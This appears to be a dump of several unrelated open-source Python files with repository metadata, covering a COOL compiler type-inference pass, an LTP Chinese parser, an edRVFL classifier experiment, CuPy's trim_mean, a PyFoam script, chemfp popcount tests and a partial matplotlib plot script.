def visit(self, node: ast.ProgramNode, scope: Scope):
for i, elem in enumerate(node.declarations):
self.visit(elem, scope.children[i])
return scope
@visitor.when(ast.ClassDeclarationNode)
def visit(self, node: ast.ClassDeclarationNode, scope: Scope):
self.current_type = self.context.get_type(node.id)
attrs = [
feature
for feature in node.features
if isinstance(feature, ast.AttrDeclarationNode)
]
methods = [
feature
for feature in node.features
if isinstance(feature, ast.MethodDeclarationNode)
]
i = 0
for attr in attrs:
if attr.expr is not None:
attr.index = i
i += 1
self.visit(attr, scope)
for i, method in enumerate(methods, i):
self.visit(method, scope.children[i])
@visitor.when(ast.AttrDeclarationNode)
def visit(self, node: ast.AttrDeclarationNode, scope: Scope):
attr_type = self.context.get_type(node.type)
var_info = scope.find_variable(node.id)
if node.expr is not None:
self.visit(node.expr, scope.children[node.index])
if attr_type == self.context.get_type("AUTO_TYPE"):
if var_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % node.id)
node.type = var_info.type.name
@visitor.when(ast.MethodDeclarationNode)
def visit(self, node: ast.MethodDeclarationNode, scope: Scope):
self.current_method = self.current_type.get_method(node.id)
return_type = self.context.get_type(node.return_type)
for i, (name, expr_body_type) in enumerate(node.params):
variable_info = scope.find_variable(name)
if variable_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % name)
node.params[i] = (name, variable_info.type.name)
self.visit(node.body, scope)
if return_type == self.context.get_type("AUTO_TYPE"):
if self.current_method.return_type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % node.id)
node.return_type = self.current_method.return_type.name
@visitor.when(ast.LetNode)
def visit(self, node: ast.LetNode, scope: Scope):
child_index = 0
for i, (_id, _type, _expr) in enumerate(node.declarations):
variable_info = scope.find_variable(_id)
if _expr is not None:
self.visit(_expr, scope.children[child_index])
child_index += 1
if _type == "AUTO_TYPE":
if variable_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % _id)
node.declarations[i] = (_id, variable_info.type.name, _expr)
self.visit(node.expr, scope.children[child_index])
@visitor.when(ast.AssignNode)
def visit(self, node: ast.AssignNode, scope: Scope):
self.visit(node.expr, scope.children[0])
@visitor.when(ast.BlockNode)
def visit(self, node: ast.BlockNode, scope: Scope):
child_scope = scope.children[0]
for _, expr in enumerate(node.expressions):
self.visit(expr, child_scope)
@visitor.when(ast.ConditionalNode)
def visit(self, node: ast.ConditionalNode, scope: Scope):
self.visit(node.if_expr, scope)
self.visit(node.then_expr, scope.children[0])
self.visit(node.else_expr, scope.children[1])
@visitor.when(ast.WhileNode)
def visit(self, node: ast.WhileNode, scope: Scope):
self.visit(node.condition, scope)
self.visit(node.body, scope.children[0])
@visitor.when(ast.SwitchCaseNode)
def visit(self, node: ast.SwitchCaseNode, scope: Scope):
self.visit(node.expr, scope)
for i, (_, _, _expr) in enumerate(node.cases):
self.visit(_expr, scope.children[i])
@visitor.when(ast.MethodCallNode)
def visit(self, node: ast.MethodCallNode, scope: Scope):
self.visit(node.obj, scope)
for arg in node.args:
self.visit(arg, scope)
@visitor.when(ast.AtomicNode)
def visit(self, node: ast.AtomicNode, scope: Scope):
pass
@visitor.when(ast.UnaryNode)
def visit(self, node: ast.UnaryNode, scope: Scope):
self.visit(node.expr, scope)
@visitor.when(ast.BinaryNode)
def visit(self, node: ast.BinaryNode, scope: Scope):
self.visit(node.left, scope)
self.visit(node.right, scope)
| 37.502558 | 118 | 0.608143 | 3,570 | 29,327 | 4.829412 | 0.079272 | 0.027667 | 0.029233 | 0.038977 | 0.570327 | 0.489937 | 0.421669 | 0.389247 | 0.34244 | 0.312511 | 0 | 0.000533 | 0.29645 | 29,327 | 781 | 119 | 37.550576 | 0.83507 | 0.092099 | 0 | 0.376098 | 0 | 0 | 0.02626 | 0.007553 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135325 | false | 0.008787 | 0.012302 | 0.035149 | 0.249561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b1cc345188ec2513c3e78f2624627d00892d95 | 3,585 | py | Python | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | 1 | 2020-11-23T05:04:18.000Z | 2020-11-23T05:04:18.000Z | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | null | null | null | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# File: sentence_parser.py
# Author: HKH<xtuhch@163.com>
# Date: 18-3-10
import os
from pyltp import Segmentor, Postagger, Parser, NamedEntityRecognizer, SementicRoleLabeller
class LtpParser:
def __init__(self):
LTP_DIR = "F:\\LTP\\ltp_data_v3.4.0\\"
self.segmentor = Segmentor()
self.segmentor.load(os.path.join(LTP_DIR, "cws.model"))
self.postagger = Postagger()
self.postagger.load(os.path.join(LTP_DIR, "pos.model"))
self.parser = Parser()
self.parser.load(os.path.join(LTP_DIR, "parser.model"))
self.recognizer = NamedEntityRecognizer()
self.recognizer.load(os.path.join(LTP_DIR, "ner.model"))
self.labeller = SementicRoleLabeller()
self.labeller.load(os.path.join(LTP_DIR, 'pisrl_win.model'))
def release(self):
self.segmentor.release()
self.postagger.release()
self.recognizer.release()
self.parser.release()
self.labeller.release()
'''语义角色标注'''
def format_labelrole(self, words, postags):
arcs = self.parser.parse(words, postags)
roles = self.labeller.label(words, postags, arcs)
roles_dict = {}
for role in roles:
roles_dict[role.index] = {arg.name:[arg.name,arg.range.start, arg.range.end] for arg in role.arguments}
return roles_dict
'''句法分析---为句子中的每个词语维护一个保存句法依存儿子节点的字典'''
def build_parse_child_dict(self, words, postags, arcs):
child_dict_list = []
format_parse_list = []
for index in range(len(words)):
child_dict = dict()
for arc_index in range(len(arcs)):
if arcs[arc_index].head == index+1: #arcs的索引从1开始
if arcs[arc_index].relation in child_dict:
child_dict[arcs[arc_index].relation].append(arc_index)
else:
child_dict[arcs[arc_index].relation] = []
child_dict[arcs[arc_index].relation].append(arc_index)
child_dict_list.append(child_dict)
rely_id = [arc.head for arc in arcs] # 提取依存父节点id
relation = [arc.relation for arc in arcs] # 提取依存关系
heads = ['Root' if id == 0 else words[id - 1] for id in rely_id] # 匹配依存父节点词语
for i in range(len(words)):
# ['ATT', '李克强', 0, 'nh', '总理', 1, 'n']
a = [relation[i], words[i], i, postags[i], heads[i], rely_id[i]-1, postags[rely_id[i]-1]]
format_parse_list.append(a)
return child_dict_list, format_parse_list
'''parser主函数'''
def parser_main(self, sentence):
words = list(self.segmentor.segment(sentence))
postags = list(self.postagger.postag(words))
arcs = self.parser.parse(words, postags)
child_dict_list, format_parse_list = self.build_parse_child_dict(words, postags, arcs)
roles_dict = self.format_labelrole(words, postags)
return words, postags, child_dict_list, roles_dict, format_parse_list
if __name__ == '__main__':
parse = LtpParser()
sentence = '书房里有电脑、有音响。'#《离开》是由张宇谱曲,演唱。
words, postags, child_dict_list, roles_dict, format_parse_list = parse.parser_main(sentence)
print(words, len(words))
print(postags, len(postags))
print(child_dict_list, len(child_dict_list))
print(roles_dict)
print(format_parse_list, len(format_parse_list))
# for data in format_parse_list:
# if data[0]=='HED':
# print(data[1]) | 42.176471 | 116 | 0.614226 | 453 | 3,585 | 4.660044 | 0.247241 | 0.068214 | 0.063951 | 0.03316 | 0.241118 | 0.217433 | 0.087162 | 0.087162 | 0.087162 | 0.046424 | 0 | 0.008683 | 0.261088 | 3,585 | 85 | 117 | 42.176471 | 0.788222 | 0.075035 | 0 | 0.0625 | 0 | 0 | 0.032667 | 0.008246 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078125 | false | 0 | 0.03125 | 0 | 0.171875 | 0.078125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b280d06a060b8c1fc8e469ded1cb1d139b5bab | 3,338 | py | Python | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | 1 | 2021-10-01T12:24:37.000Z | 2021-10-01T12:24:37.000Z | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | null | null | null | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Time : 2021/4/12 12:59 上午
# @Author : Yushuo Wang
# @FileName: main.py
# @Software: PyCharm
# @Blog :https://lesliewongcv.github.io/
import numpy as np
import os
from scipy.io import loadmat
from sklearn.model_selection import KFold
def sigmoid(a, b, x):
return 1.0 / (1 + np.exp(-1.0 * (x.dot(a) + b)))
def edRVFL_prototype(X, T, C, n, L, n_node):
'''
Variables:X - input;No. of samples * No. of feature(N*n)
:H - H matrix;No. of samples * No. of hidden nodes(N*L)
:T - Target;No. of samples * No. of output nodes(N*M)
:C - Hyper-parm of the regularization
'''
# init the weight of hidden layers randomly
a_list = []
b_list = []
beta = []
T = one_hot(T)
D = X.copy()
for i in range(layers):
a = np.random.normal(0, 1, (D.shape[1], n_node))
b = np.random.normal(0, 1)
H = sigmoid(a, b, D)
D = np.concatenate((X, H), axis=1) # concatenate with X not D
a_list.append(a)
b_list.append(b)
# calculate the weight of output layers(beta) and output
DD = D.T.dot(D)
DT = D.T.dot(T)
if L > n:
beta += [np.linalg.pinv(DD + np.identity(DD.shape[0]) / C).dot(DT)]
else:
beta += [D.T.dot(np.linalg.pinv(D.dot(D.T) + np.identity(L + layers * n) / C)).dot(T)]
Fl = D.dot(beta)
return beta, Fl, a_list, b_list
def one_hot(l):
y = np.zeros([len(l), np.max(l)+1])
for i in range(len(l)):
y[i, l[i]] = 1
return y
def predict(X, BETA, a, b):
D = X.copy()
Y = []
out = np.zeros((len(X), 1))
for i in range(layers):
H = sigmoid(a[i], b[i], D)
D = np.concatenate((X, H), axis=1)
res = D.dot(BETA[i])
Y += [res.argmax(1)]
Y = np.array(Y)
for j in range(len(Y[1])):
out[j] = int(np.argmax(np.bincount(Y[:, j])))
return out
def evaluation(y_hat, goundtruth):
acc = np.sum(np.equal(y_hat, goundtruth) / len(y_hat))
return acc
KFOLD = 4
PATH = '/Users/leslie/Downloads/MatDataset/' # Path to the dataset
folders = os.listdir(PATH)
RES = []
C_list = [1e-3, 1e-2, 1e-1, 1, 1e1, 1e2, 1e3] # hyper-pram 1/C
layers = 5
progress = 0
for folder_name in folders:
progress += 100 / 29
file_name = folder_name
if folder_name == '.DS_Store':
continue
else:
matfn = PATH + folder_name + '/' + folder_name + '_Train.mat'
df_data = loadmat(matfn)['Data']
df_label = loadmat(matfn)['Label']
C = 1e1
kf = KFold(n_splits=4, shuffle=False)
for C in C_list:
vali_res = 0
for train_index, test_index in kf.split(df_label): # 4-fold
beta, Fl, A, B = edRVFL_prototype(df_data[train_index], df_label[train_index],
C=C, n=len(df_data[1]), L=len(train_index), n_node=100)
y_valid = predict(df_data[test_index], beta, A, B)
acc_valid = evaluation(y_valid, df_label[test_index])
vali_res += acc_valid
RES += [folder_name + ':' + str(vali_res/4) + ' C = ' + str(C)]
print(str(round(progress)) + "%") # show progress
RES = np.array(RES)
np.savetxt("edRVFL_acc_100_fix.txt", RES, fmt='%s', delimiter=',') | 29.539823 | 104 | 0.546735 | 533 | 3,338 | 3.322702 | 0.318949 | 0.007905 | 0.018634 | 0.022021 | 0.094862 | 0.024845 | 0.024845 | 0.024845 | 0 | 0 | 0 | 0.027566 | 0.293589 | 3,338 | 113 | 105 | 29.539823 | 0.723494 | 0.169263 | 0 | 0.102564 | 0 | 0 | 0.035845 | 0.020849 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.051282 | 0.012821 | 0.179487 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b30ec451789dd4f884c9cd6403134693729b15 | 2,126 | py | Python | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 6,180 | 2016-11-01T14:22:30.000Z | 2022-03-31T08:39:20.000Z | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 6,281 | 2016-12-22T07:42:31.000Z | 2022-03-31T19:57:02.000Z | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 829 | 2017-02-23T05:46:12.000Z | 2022-03-27T17:40:03.000Z | """
A collection of basic statistical functions for Python.
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
import cupy as cp
def trim_mean(a, proportiontocut, axis=0):
"""Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : cupy.ndarray
Input array.
proportiontocut : float
Fraction to cut off of both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> import cupy as cp
>>> from cupyx.scipy import stats
>>> x = cp.arange(20)
>>> stats.trim_mean(x, 0.1)
array(9.5)
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
if a.size == 0:
return cp.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = cp.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return cp.mean(atmp[tuple(sl)], axis=axis)
| 27.25641 | 77 | 0.583255 | 290 | 2,126 | 4.258621 | 0.489655 | 0.032389 | 0.031579 | 0.022672 | 0.02915 | 0.02915 | 0 | 0 | 0 | 0 | 0 | 0.057441 | 0.279398 | 2,126 | 77 | 78 | 27.61039 | 0.748695 | 0.66698 | 0 | 0 | 0 | 0 | 0.035581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b38b9793dd1017512c203351aeede44a4382ed | 1,949 | py | Python | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null |
from genericpath import exists
from sys import flags
from traceback import walk_tb
from PyFoam.Basics.Utilities import writeDictionaryHeader
from PyFoam.FoamInformation import changeFoamVersion, oldTutorialStructure
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
import shutil
from changfile import *
# changeFloodingDirection
# {
# enable true/false;
# inletOld ***;
# outletOld ***;
# inletNew ***;
# outletNew ****;
# inletVelocity ****; //inlet
# inletAlpha *****; //inlet
# ouletPressure ****; //outlet
# contactAngle 45; //wall
# }
def changeFloodDirection(source_path, did_copy):
U = ParsedParameterFile(source_path + "/0/U")
print("the boundary have:")
let = U["boundaryField"]
# for i in range(len(let.keys())):
# print(let[i])
# print(let)
let_it = let.keys()
for x in let_it:
print(x, end=" ")
inletOld = input("please input old intet:")
outletOld = input("please input old outlet:")
inletNew = input("please input new inlet:")
outletNew = input("please input new outlet:")
inletVelocity = input("please input inlet velocity:")
if did_copy == True:
target_path = "./FloodDirection " + str(inletOld) + '_' + str(inletNew)
file_copy(source_path, target_path)
change_trans = ParsedParameterFile(target_path + "/0/U")
else:
change_trans = U
if inletOld in let_it:
change_trans[inletOld]["type"] = "fixedValue"
if outletOld in let_it:
change_trans[outletOld]["type"] = "fixedValue"
if inletNew in let_it:
change_trans[inletNew]["type"] = "inletOutlet"
if outletNew in let_it:
change_trans[outletNew]["type"] = "inletOutlet"
change_trans[inletNew]["value"] = inletVelocity
change_trans.writeFile()
changeFloodDirection("./Tension1", True) | 20.734043 | 79 | 0.644433 | 207 | 1,949 | 5.94686 | 0.386473 | 0.071487 | 0.028432 | 0.042242 | 0.058489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00336 | 0.236532 | 1,949 | 94 | 80 | 20.734043 | 0.823925 | 0.169831 | 0 | 0 | 0 | 0 | 0.157928 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.236842 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b3c3115ab976f05caa295d2b7c1ec8bd35c689 | 10,247 | py | Python | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, with_statement
import unittest2
from support import fullpath
import chemfp
import chemfp.bitops
import _chemfp
set_alignment_method = chemfp.bitops.set_alignment_method
get_alignment_method = chemfp.bitops.get_alignment_method
CHEBI_TARGETS = fullpath("chebi_rdmaccs.fps")
CHEBI_QUERIES = fullpath("chebi_queries.fps.gz")
targets = chemfp.load_fingerprints(CHEBI_TARGETS, alignment=8)
targets_64 = chemfp.load_fingerprints(CHEBI_TARGETS, alignment=64)
available_methods = chemfp.bitops.get_methods()
alignment_methods = chemfp.bitops.get_alignment_methods()
all_methods = dict.fromkeys("LUT8-1 LUT8-4 LUT16-4 Lauradoux POPCNT Gillies ssse3".split())
class TestMethods(unittest2.TestCase):
def test_no_duplicates(self):
methods = chemfp.bitops.get_methods()
self.assertEquals(len(methods), len(set(methods)))
def test_for_unknown_methods(self):
for method in chemfp.bitops.get_methods():
self.assertIn(method, all_methods)
def test_for_possible_missing_popcnt(self):
if len(all_methods) == 4:
self.assertNotIn("POPCNT", chemfp.get_methods())
def test_internal_bad_args(self):
with self.assertRaisesRegexp(IndexError, "method index is out of range"):
_chemfp.get_method_name(-1)
with self.assertRaisesRegexp(IndexError, "method index is out of range"):
_chemfp.get_method_name(_chemfp.get_num_methods())
all_alignments = dict.fromkeys("align1 align4 align8-small align8-large align-ssse3".split())
class TestAlignments(unittest2.TestCase):
def test_no_duplicates(self):
alignments = chemfp.bitops.get_alignments()
self.assertEquals(len(alignments), len(set(alignments)))
self.assertEquals(len(alignments), len(all_alignments))
def test_for_unknown_alignments(self):
for alignment in chemfp.bitops.get_alignments():
self.assertIn(alignment, all_alignments)
def test_get_set_alignment_method(self):
for alignment in chemfp.bitops.get_alignments():
method = get_alignment_method(alignment)
self.assertIn(method, all_methods)
set_alignment_method(alignment, "LUT8-1")
self.assertEqual(get_alignment_method(alignment), "LUT8-1")
set_alignment_method(alignment, method)
self.assertEqual(get_alignment_method(alignment), method)
def test_internal_bad_args(self):
with self.assertRaisesRegexp(IndexError, "alignment index is out of range"):
_chemfp.get_alignment_name(-1)
with self.assertRaisesRegexp(IndexError, "alignment index is out of range"):
_chemfp.get_alignment_name(_chemfp.get_num_methods())
# I didn't want a better error code for this
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.get_alignment_method(-1))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.get_alignment_method(100))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.set_alignment_method(-1, 0))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.set_alignment_method(100, 0))
def test_cannot_use_64_bit_method_for_shorter_bit_alignment(self):
msg = "Mismatch between popcount method and alignment type"
available_methods = chemfp.bitops.get_methods()
for method in ("Lauradoux", "Gillies", "POPCNT"):
if (method == "POPCNT") and ("POPCNT" not in available_methods):
continue
with self.assertRaisesRegexp(ValueError, msg):
set_alignment_method("align1", method)
with self.assertRaisesRegexp(ValueError, msg):
set_alignment_method("align4", method)
@unittest2.skipIf("ssse3" not in available_methods, "CPU does not implement SSSE3")
def test_ssse3(self):
method = get_alignment_method("align-ssse3")
# This disables SSSE3 support
set_alignment_method("align-ssse3", "LUT8-1")
self.assertEquals(get_alignment_method("align-ssse3"), "LUT8-1")
set_alignment_method("align-ssse3", "ssse3")
self.assertEquals(get_alignment_method("align-ssse3"), "ssse3")
set_alignment_method("align-ssse3", method)
class TestAlign8SmallMethods(unittest2.TestCase):
def setUp(self):
self.small_method = get_alignment_method("align8-small")
self.large_method = get_alignment_method("align8-large")
self.ssse3_method = get_alignment_method("align-ssse3")
def tearDown(self):
set_alignment_method("align8-small", self.small_method)
set_alignment_method("align8-large", self.large_method)
set_alignment_method("align-ssse3", self.ssse3_method)
def _doit(self, method):
for alignment in ("align8-small", "align8-large", "align-ssse3"):
set_alignment_method(alignment, method)
self.assertEquals(get_alignment_method(alignment), method)
hits = targets.id_knearest_tanimoto_search_fp("00000000100410200290000b03a29241846163ee1f".decode("hex"), k=12, threshold=0.2)
self.assertEqual(hits, [('CHEBI:8069', 1.0),
('CHEBI:6758', 0.78723404255319152),
('CHEBI:7983', 0.73999999999999999),
('CHEBI:8107', 0.6956521739130435),
('CHEBI:17568', 0.6904761904761905),
('CHEBI:16294', 0.6818181818181818),
('CHEBI:16964', 0.673469387755102),
('CHEBI:17477', 0.6458333333333334),
('CHEBI:17025', 0.62),
('CHEBI:15901', 0.6122448979591837),
('CHEBI:16742', 0.6122448979591837),
('CHEBI:4888', 0.6078431372549019)])
def test_lut8_1(self):
self._doit("LUT8-1")
def test_lut8_4(self):
self._doit("LUT8-4")
def test_lut16_4(self):
self._doit("LUT16-4")
def test_lauradoux(self):
with self.assertRaisesRegexp(ValueError, "Mismatch between popcount method and alignment type"):
set_alignment_method("align8-small", "Lauradoux")
@unittest2.skipIf("POPCNT" not in alignment_methods, "CPU does not implement POPCNT")
def test_popcnt(self):
self._doit("POPCNT")
class TestAlign8LargeMethods(unittest2.TestCase):
def setUp(self):
self.large_method = get_alignment_method("align8-large")
self.ssse3_method = get_alignment_method("align-ssse3")
def tearDown(self):
set_alignment_method("align8-large", self.large_method)
set_alignment_method("align-ssse3", self.ssse3_method)
def _doit(self, method, use_ssse3=False):
set_alignment_method("align8-large", method)
self.assertEquals(get_alignment_method("align8-large"), method)
if use_ssse3:
set_alignment_method("align-ssse3", "ssse3")
self.assertEquals(get_alignment_method("align-ssse3"), "ssse3")
else:
set_alignment_method("align-ssse3", "LUT8-1")
self.assertEquals(get_alignment_method("align-ssse3"), "LUT8-1")
hits = targets_64.id_knearest_tanimoto_search_fp("00000000100410200290000b03a29241846163ee1f".decode("hex"), k=12, threshold=0.2)
self.assertEqual(hits, [('CHEBI:8069', 1.0),
('CHEBI:6758', 0.78723404255319152),
('CHEBI:7983', 0.73999999999999999),
('CHEBI:8107', 0.6956521739130435),
('CHEBI:17568', 0.6904761904761905),
('CHEBI:16294', 0.6818181818181818),
('CHEBI:16964', 0.673469387755102),
('CHEBI:17477', 0.6458333333333334),
('CHEBI:17025', 0.62),
('CHEBI:15901', 0.6122448979591837),
('CHEBI:16742', 0.6122448979591837),
('CHEBI:4888', 0.6078431372549019)])
def test_lut8_1(self):
self._doit("LUT8-1")
def test_lut8_4(self):
self._doit("LUT8-4")
def test_lut16_4(self):
self._doit("LUT16-4")
def test_lauradoux(self):
self._doit("Lauradoux")
def test_gillies(self):
self._doit("Gillies")
@unittest2.skipIf("ssse3" not in available_methods, "CPU does not implement SSSE3")
def test_ssse3(self):
self._doit("Lauradoux", use_ssse3=True)
@unittest2.skipIf("POPCNT" not in available_methods, "CPU does not implement POPCNT")
def test_popcnt(self):
self._doit("POPCNT")
class TestSelectFastestMethod(unittest2.TestCase):
def setUp(self):
self._alignment_methods = chemfp.bitops.get_alignment_methods()
def tearDown(self):
for k,v in self._alignment_methods.items():
set_alignment_method(k, v)
def test_select_fastest(self):
for alignment in all_alignments:
set_alignment_method(alignment, "LUT8-1")
self.assertEquals(get_alignment_method(alignment), "LUT8-1")
chemfp.bitops.select_fastest_method()
best_methods1 = chemfp.bitops.get_alignment_methods()
for alignment in all_alignments:
set_alignment_method(alignment, "LUT8-1")
self.assertEquals(get_alignment_method(alignment), "LUT8-1")
chemfp.bitops.select_fastest_method()
best_methods2 = chemfp.bitops.get_alignment_methods()
self.assertEquals(best_methods1, best_methods2) # This might fail if two methods have nearly identical timings
chemfp.bitops.select_fastest_method(repeat=-1000)
if __name__ == "__main__":
chemfp.bitops.use_environment_variables()
unittest2.main()
| 42.342975 | 137 | 0.645164 | 1,127 | 10,247 | 5.612245 | 0.15173 | 0.118577 | 0.071146 | 0.055336 | 0.759209 | 0.686957 | 0.573597 | 0.526166 | 0.492332 | 0.492332 | 0 | 0.090177 | 0.248951 | 10,247 | 241 | 138 | 42.518672 | 0.731679 | 0.012784 | 0 | 0.540984 | 0 | 0 | 0.139339 | 0.008307 | 0 | 0 | 0 | 0 | 0.169399 | 1 | 0.169399 | false | 0 | 0.032787 | 0 | 0.229508 | 0.010929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b56884859b12e855992f80015331be2b6ea620 | 1,832 | py | Python | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
fig, ax = plt.subplots(2, 2)
print(ax, type(ax), len(ax))
x = [10.09950494, 16.43167673, 27.03701167]
x1 = [10.09950494, 27.03701167]
ax[0][0].set(title="nSteps", xlabel="sqrt(n_squares)", ylabel="nSteps")
y1 = [33, 110, 327]
ax[0][0].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [15, 36, 53]
ax[0][0].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [15, 53, ]
ax[0][0].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[0][0].set_ylim(bottom=0)
ax[0][0].legend()
ax[0][1].set(title="Successors", xlabel="sqrt(n_squares)", ylabel="Successors")
y1 = [45, 115, 404, ]
ax[0][1].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [283, 219557, 227716, ]
ax[0][1].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [377, 231030]
ax[0][1].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[1][0].set(title="Search Time", xlabel="sqrt(n_squares)", ylabel="Search Time (s)")
y1 = [0.064, 0.413, 2.116, ]
